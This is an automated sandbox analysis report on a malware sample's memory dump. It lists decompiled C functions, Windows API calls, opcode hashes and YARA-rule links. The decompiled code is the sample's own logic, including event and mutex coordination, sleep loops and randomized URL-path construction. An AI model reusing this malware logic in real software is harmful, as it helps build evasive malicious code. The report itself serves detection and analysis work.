0x00000000
0x00757cbd
0x00757bca
0x00757bd1
0x00757bd5
0x00757bdb
0x00757bdd
0x00757bdf
0x00757be1
0x00757be3
0x00757bed
0x00757bf2
0x00757bf4
0x00757bf6
0x00757bf7
0x00757bf8
0x00757bf9
0x00757c00
0x00757c07
0x00757c0a
0x00757c0a
0x00757bd7
0x00757bd7
0x00757bd7
0x00757c12
0x00757c1a
0x00757c26
0x00757c2b
0x00757c2b
0x00757c30
0x00000000
0x00000000
0x00757c32
0x00757c35
0x00757c42
0x00000000
0x00000000
0x00757c44
0x00757c44
0x00757c51
0x00757c2b
0x00757c30
0x00000000
0x00000000
0x00000000
0x00757c30
0x00757c5b
0x00757c5e
0x00757c61
0x00757c68
0x00757c68
0x00757c75
0x00000000
0x00757c75
0x00757b61
0x00757b65
0x00757b66
0x00757b68
0x00000000
0x00000000
0x00000000
0x00757b68
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00757BE3
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00757BF9
memset.NTDLL ref: 00757CA2
memset.NTDLL ref: 00757CB8

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 46c09b0f4a0aba91e9922ac65ceda8cdabb2a16a238fda1c73a7bc9ae306261f
Instruction ID: 286c453af319b1aba5b04fb345ec59c1e8fcb18092f8c0a78d48dca0523204ad
Opcode Fuzzy Hash: 46c09b0f4a0aba91e9922ac65ceda8cdabb2a16a238fda1c73a7bc9ae306261f
Instruction Fuzzy Hash: 0141E271A00209ABDB14EF68DC46BEE7779EF45311F104569FD09A7281EBB89E48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00757CC7, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00757CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x75d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x75d2e0; // 0x25ca5a8
				_t3 = _t8 + 0x75e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E00753CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x75d2e4, 1, 0, _t30);
					E00754AAB(_t30);
				}
				_t12 =  *0x75d294; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00754A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00751000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x75d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00755AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00757cc8
0x00757ccf
0x00757cd9
0x00757cdd
0x00757ce3
0x00757cf2
0x00757cf9
0x00757cfd
0x00757d0f
0x00757d11
0x00757d11
0x00757d16
0x00757d1d
0x00757d74
0x00757d74
0x00757d7a
0x00757d7c
0x00757d7c
0x00757d86
0x00757d8a
0x00757d9c
0x00757d9c
0x00757da0
0x00757da6
0x00757da6
0x00000000
0x00757d36
0x00757d3b
0x00757d43
0x00757d47
0x00757d4b
0x00757d4b
0x00757d58
0x00757d5c
0x00757d60
0x00757db5
0x00757dbb
0x00757dbb
0x00757d6e
0x00757d72
0x00757da9
0x00757dab
0x00757dae
0x00757dae
0x00000000
0x00757dab
0x00757d72
0x00000000
0x00757d5c

APIs

Part of subcall function 00753CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,02D29B38,00000000,?,?,69B25F44,00000005,0075D00C,?,?,0075539B), ref: 00753CF8
Part of subcall function 00753CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 00753D1C
Part of subcall function 00753CC2: lstrcat.KERNEL32(00000000,00000000), ref: 00753D24

CreateEventA.KERNEL32(0075D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,007521B6,?,00000001,?), ref: 00757D08

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

WaitForSingleObject.KERNEL32(00000000,00004E20,007521B6,00000000,00000000,?,00000000,?,007521B6,?,00000001,?,?,?,?,0075555B), ref: 00757D68
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,007521B6,?,00000001,?), ref: 00757D96
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,007521B6,?,00000001,?,?,?,?,0075555B), ref: 00757DAE

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 187bc4e7fe74f1ad98c95df6c2934aad0454536de4304f07012eec45c5873f8c
Instruction ID: cfc8d99e346736978599e575a1cc03329ffec11c153eb90bf5bca44514a670b3
Opcode Fuzzy Hash: 187bc4e7fe74f1ad98c95df6c2934aad0454536de4304f07012eec45c5873f8c
Instruction Fuzzy Hash: 2321E1327047029BC7365B68AC88BFB72B9FF88713B054225FD499B240DAEDCC49C694

Uniqueness

Uniqueness Score: -1.00%

Function 6ED002A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 6ED0039A
task.LIBCPMTD ref: 6ED003A6
task.LIBCPMTD ref: 6ED003B2
task.LIBCPMTD ref: 6ED003C1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 71fa7dbd7019bcad6d924fddb7c4b183ee59baa99b8be540a15be531a8fdba0b
Instruction ID: 41fa1203c62eb918d984024b9f0308571145ad3bf872419a2af43e609b6a6a01
Opcode Fuzzy Hash: 71fa7dbd7019bcad6d924fddb7c4b183ee59baa99b8be540a15be531a8fdba0b
Instruction Fuzzy Hash: 4B4109B1C00248EFDB54CFE4C940BDDBBB4BF48208F1086A9E419AB281EB755A49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00752107, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00752107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00753946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E007565EA(_t23);
						}
					}
					return _t38;
				}
				if(E007537AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x75d2e4, 1, 0,  *0x75d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E007524BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0075282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E007551BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00757CC7( &_v32, _t39);
					goto L13;
				}
			}

0x00752107
0x00752114
0x0075211a
0x0075211b
0x0075211c
0x0075211d
0x0075211e
0x00752122
0x0075212e
0x00752132
0x007521ba
0x007521ba
0x007521bd
0x007521bf
0x007521c7
0x007521c7
0x007521cd
0x007521d0
0x007521d0
0x007521cd
0x007521db
0x007521db
0x00752145
0x00752147
0x00752147
0x0075215e
0x00752162
0x00752165
0x00752170
0x00752177
0x00752177
0x00752180
0x00752184
0x00752192
0x00752186
0x00752186
0x00752187
0x00752188
0x00752189
0x0075218a
0x0075218b
0x0075218b
0x00752197
0x0075219a
0x0075219e
0x007521a0
0x007521a0
0x007521a7
0x00000000
0x007521a9
0x007521a9
0x007521b6
0x00000000
0x007521b6

APIs

CreateEventA.KERNEL32(0075D2E4,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,0075555B,?,00000001,?), ref: 00752158
SetEvent.KERNEL32(00000000,?,?,?,0075555B,?,00000001,?,00000002,?,?,007553C9,?), ref: 00752165
Sleep.KERNEL32(00000BB8,?,?,?,0075555B,?,00000001,?,00000002,?,?,007553C9,?), ref: 00752170
CloseHandle.KERNEL32(00000000,?,?,?,0075555B,?,00000001,?,00000002,?,?,007553C9,?), ref: 00752177

Part of subcall function 007524BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,00752197,?,00752197,?,?,?,?,?,00752197,?), ref: 00752598

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 167f1e04e60775c6dbcf866900fccfaaa7993be9dca205c63b367b55f01d93bc
Instruction ID: 0972f6dab87c47edf68eead15ba15d8f638f6819ad70ac01be7f7b0b53f7d70d
Opcode Fuzzy Hash: 167f1e04e60775c6dbcf866900fccfaaa7993be9dca205c63b367b55f01d93bc
Instruction Fuzzy Hash: 4121AF72D0061DEBCB20AFE48C899EF77B9AB49352B058425FF15A7101D7BC9D4A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED408CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dfcdd151fac80285f6a047480f8bd8ce0852f25e520494b5c555003a68da5d1
Instruction ID: bfeff0c6cef6d18fb16fb33a0d6192d8aad8d9837516f13f1333abf6daeadb84
Opcode Fuzzy Hash: 8dfcdd151fac80285f6a047480f8bd8ce0852f25e520494b5c555003a68da5d1
Instruction Fuzzy Hash: 0621C333A05622EBFF615BA98C44B4A77689B337E0F190510E995AB2C4F630ED0185E2

Uniqueness

Uniqueness Score: -1.00%

Function 007522D2, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E007522D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E007575F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x007522de
0x007522e2
0x007522e3
0x007522e4
0x007522e6
0x007522e8
0x007522eb
0x007522f0
0x00752387
0x0075238e
0x0075238e
0x007522f9
0x00752300
0x00752310
0x00752310
0x00752316
0x00752318
0x0075231d
0x00752326
0x0075232c
0x00752331
0x0075233c
0x00752340
0x00752342
0x00752343
0x0075234c
0x00752350
0x00752361
0x00752352
0x00752357
0x0075235c
0x0075236b
0x0075236b
0x00752340
0x00752371
0x00752377
0x00752377
0x00752380
0x00752385
0x00752385
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00752300
lstrlenW.KERNEL32(?), ref: 00752336
memcpy.NTDLL(00000000,?,?,?), ref: 00752357
SysFreeString.OLEAUT32(?), ref: 0075236B

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 572f9c800b4de21a54c12c2498a99992cd45824a7563368cff96f5d0c2febcf1
Instruction ID: 4845e8e9ddf421cad14dee863e4d984a2df12364eb54b4d8d135c9ad8852ef85
Opcode Fuzzy Hash: 572f9c800b4de21a54c12c2498a99992cd45824a7563368cff96f5d0c2febcf1
Instruction Fuzzy Hash: 74217475900209EFCB11DFA8C8889DEBBB8FF49302B108169EC45E7211EB78DA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
_free.LIBCMT ref: 6ED3F2FB
_free.LIBCMT ref: 6ED3F331
SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 73f02e0a8235f662ff08665c6d44b9f06829c0695c55c4d657e514e5e409a019
Instruction ID: 6dfd97b266b36cee0032f02ed992d8a43c185b4c3d9ebbeda69f7164534427f6
Opcode Fuzzy Hash: 73f02e0a8235f662ff08665c6d44b9f06829c0695c55c4d657e514e5e409a019
Instruction Fuzzy Hash: 6011CA3621591AEEEA9017F48C84DDB315E9BD36B8B340925F138D61D0EF35D80A8131

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6ED28835,6ED3F53A,?,?,6ECF565E,000008BB,6ED8A0D4), ref: 6ED3F3F5
_free.LIBCMT ref: 6ED3F452
_free.LIBCMT ref: 6ED3F488
SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,?,?,6ED28835,6ED3F53A,?,?,6ECF565E,000008BB,6ED8A0D4), ref: 6ED3F493

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 80dd251047edc204ae48033f53b725235e0de492754363195a1962fa1ae78eaa
Instruction ID: dfbbea58bd9eed763562a0f8714abee1b3c104b9045b1f2ae47a8bdfa67582c0
Opcode Fuzzy Hash: 80dd251047edc204ae48033f53b725235e0de492754363195a1962fa1ae78eaa
Instruction Fuzzy Hash: E911E932314919AEEBA027F98C80DDB325DA7E36B9B340A34F528931D0EB34D80A8130

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED0039A
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003A6
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003B2
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003C1

task.LIBCPMTD ref: 6ECFF95F
task.LIBCPMTD ref: 6ECFF96B
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6ECFF980
task.LIBCPMTD ref: 6ECFF998

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 2520070614-0
Opcode ID: ca1eb51249314f664fba9cf191de70394211de8a880f2284b36123bd5c1accc4
Instruction ID: af19d7ac6c9e03897f0df3e43c3461395960fdce211604ffb76cfa7a498dac13
Opcode Fuzzy Hash: ca1eb51249314f664fba9cf191de70394211de8a880f2284b36123bd5c1accc4
Instruction Fuzzy Hash: E321E971D0464CEBCB44DFE4C950BDEBBB9FF48314F148569E429AB294EB346A09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED0039A
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003A6
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003B2
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003C1

task.LIBCPMTD ref: 6ECFF87F
task.LIBCPMTD ref: 6ECFF88B
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6ECFF8A0
task.LIBCPMTD ref: 6ECFF8B8

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 2520070614-0
Opcode ID: 649f5f77cbceb9bd26ab0f93fb72353e6c0633f6d4f1d178d57088b4c9e34704
Instruction ID: e8a104606749e07bc24164d017b563662b2651fa0ac8770ec86c2eb2ed56edf9
Opcode Fuzzy Hash: 649f5f77cbceb9bd26ab0f93fb72353e6c0633f6d4f1d178d57088b4c9e34704
Instruction Fuzzy Hash: C921FC71D0464CEBCB44DFD4C950BDEBBB9FF48314F148569E425AB294EB346A05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007526DD, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007526DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x75d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x75d288; // 0xab58b2d2
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x75d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x007526e5
0x007526e8
0x007526ee
0x00752706
0x00752708
0x0075270d
0x0075270f
0x00752712
0x00752714
0x00752717
0x00752719
0x00752719
0x0075271b
0x00752726
0x0075272b
0x0075273c
0x00752744
0x00752749
0x0075274c
0x0075274f
0x00752751
0x00752754
0x00752757
0x00752757
0x0075275a
0x00752765
0x0075276a
0x00752774

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00751A07,00000000,?,?,00754653,?,02D295B0), ref: 007526E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 00752700
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00751A07,00000000,?,?,00754653,?,02D295B0), ref: 00752744
memcpy.NTDLL(00000001,?,00000001), ref: 00752765

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: da48ceba51517d3d21f03affa80c3c00912ca5f555866f11944ca84b4543f868
Instruction ID: 0ffab776f645115b433c9efb77b70216921f311bdaaf702fae18bb32d8f63b38
Opcode Fuzzy Hash: da48ceba51517d3d21f03affa80c3c00912ca5f555866f11944ca84b4543f868
Instruction Fuzzy Hash: 28113A72A00314AFD320CB69DC85EDEBBAEEBC4752F044276F904D7151E6B49E048794

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01E36
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01E43
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6ED01E80

Part of subcall function 6ED00FAE: _Yarn.LIBCPMT ref: 6ED00FCD
Part of subcall function 6ED00FAE: _Yarn.LIBCPMT ref: 6ED00FF1

std::exception::exception.LIBCMTD ref: 6ED01EA5

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
String ID:
API String ID: 2425033533-0
Opcode ID: 6d6b8abd798ce9efcce46786cafc7d31459dcf5bfcbb8e1f984b0dd85f9294ce
Instruction ID: 3636aa6f343a263dc178cd25cb1dddcfc455d4acd92d5ee64621891c68014ca3
Opcode Fuzzy Hash: 6d6b8abd798ce9efcce46786cafc7d31459dcf5bfcbb8e1f984b0dd85f9294ce
Instruction Fuzzy Hash: E30180B1405784AECB308FAA948058BFEE4BF28254B548D6FE58D87B00D770D504CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00754450, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00754450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x75d2a4; // 0x214
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x75d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x75d2a4; // 0x214
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x75d270; // 0x2930000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00754450
0x00754457
0x007544a1
0x007544a3
0x007544a3
0x0075445b
0x00754461
0x00754466
0x0075446a
0x00754470
0x00754477
0x00000000
0x00000000
0x00754479
0x0075447e
0x00000000
0x00000000
0x00000000
0x0075447e
0x00754480
0x00754488
0x0075448b
0x0075448b
0x00754491
0x00754498
0x0075449b
0x0075449b
0x00000000

APIs

SetEvent.KERNEL32(00000214,00000001,0075191C), ref: 0075445B
SleepEx.KERNEL32(00000064,00000001), ref: 0075446A
CloseHandle.KERNEL32(00000214), ref: 0075448B
HeapDestroy.KERNEL32(02930000), ref: 0075449B

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: aa9c39f183ea1b38570b845d7451892d0e484ffe20d682ba6593288dd52f28b9
Instruction ID: 5d7976ed4511f97e4437c08038131091e993f1ee39ac5722de747f51d0efdeb5
Opcode Fuzzy Hash: aa9c39f183ea1b38570b845d7451892d0e484ffe20d682ba6593288dd52f28b9
Instruction Fuzzy Hash: F4F01C71B403529FDB305B35ED48BC636ACAB04767B058110BC08D71D0DFECCC898668

Uniqueness

Uniqueness Score: -1.00%

Function 00754B98, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00754B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x75d364; // 0x2d295b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x75d364; // 0x2d295b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x75d364; // 0x2d295b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x75e823) {
					HeapFree( *0x75d270, 0, _t10);
					_t7 =  *0x75d364; // 0x2d295b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00754b98
0x00754ba1
0x00754bb1
0x00754bb1
0x00754bb6
0x00754bbb
0x00000000
0x00000000
0x00754bab
0x00754bab
0x00754bbd
0x00754bc2
0x00754bc6
0x00754bd9
0x00754bdf
0x00754bdf
0x00754be8
0x00754bea
0x00754bee
0x00754bf4

APIs

RtlEnterCriticalSection.NTDLL(02D29570), ref: 00754BA1
Sleep.KERNEL32(0000000A,?,00755390), ref: 00754BAB
HeapFree.KERNEL32(00000000,?,?,00755390), ref: 00754BD9
RtlLeaveCriticalSection.NTDLL(02D29570), ref: 00754BEE

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5ff07b24925fd61f77cfc2bbe0e63c52881b1694ee07aac61dcf968f220fede0
